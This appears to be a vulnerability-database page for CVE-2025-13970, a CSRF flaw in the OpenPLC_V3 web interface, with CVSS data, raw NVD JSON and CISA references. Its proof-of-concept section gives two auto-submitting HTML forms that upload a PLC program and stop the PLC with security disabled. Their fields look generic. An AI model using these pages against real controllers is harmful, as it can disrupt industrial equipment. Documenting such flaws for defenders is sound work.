Security Vulnerability Report
CVE-2025-13970 CVSS 8.0 HIGH

CVE-2025-13970

Published: 2025-12-13 01:15:52
Last Modified: 2026-04-15 00:35:42

Description

OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack due to the absence of proper CSRF validation. This issue allows an unauthenticated attacker to trick a logged-in administrator into visiting a maliciously crafted link, potentially enabling unauthorized modification of PLC settings or the upload of malicious programs which could lead to significant disruption or damage to connected systems.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenPLC_V3 < fixed version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-13970: OpenPLC_V3 PLC Program Upload -->
<!-- This PoC demonstrates uploading a malicious PLC program -->
<html>
<body>
  <h1>CVE-2025-13970 CSRF Attack PoC</h1>
  <p>Target: OpenPLC_V3 Web Interface</p>
  <p>Action: Upload malicious PLC program</p>
  <form id="csrfForm" action="http://target:8080/upload_program" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="program_name" value="malicious_program.st" />
    <input type="hidden" name="program_content" value="(* Malicious ST code - triggers unauthorized control logic *) VAR x AT %IX0.0 : BOOL; END_VAR IF x THEN (* Execute malicious operations *) END_IF" />
    <input type="hidden" name="action" value="upload" />
    <input type="hidden" name="csrf_token" value="" />
  </form>
  <script>
    // Auto-submit the form when page loads
    document.addEventListener('DOMContentLoaded', function() {
      document.getElementById('csrfForm').submit();
    });
  </script>
  <p>If you see this message, the attack failed.</p>
</body>
</html>

<!-- Alternative: Configuration Modification CSRF PoC -->
<html>
<body>
  <form id="configAttack" action="http://target:8080/api/config/update" method="POST">
    <input type="hidden" name="plc_mode" value="stop" />
    <input type="hidden" name="io_mapping" value="modified_mapping" />
    <input type="hidden" name="security_enabled" value="false" />
  </form>
  <script>document.getElementById('configAttack').submit();</script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13970", "sourceIdentifier": "[email protected]", "published": "2025-12-13T01:15:51.733", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack \ndue to the absence of proper CSRF validation. This issue allows an \nunauthenticated attacker to trick a logged-in administrator into \nvisiting a maliciously crafted link, potentially enabling unauthorized \nmodification of PLC settings or the upload of malicious programs which \ncould lead to significant disruption or damage to connected systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-345-10.json", "source": "[email protected]"}, {"url": "https://github.com/thiagoralves/OpenPLC_v3", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10", "source": "[email protected]"}]}}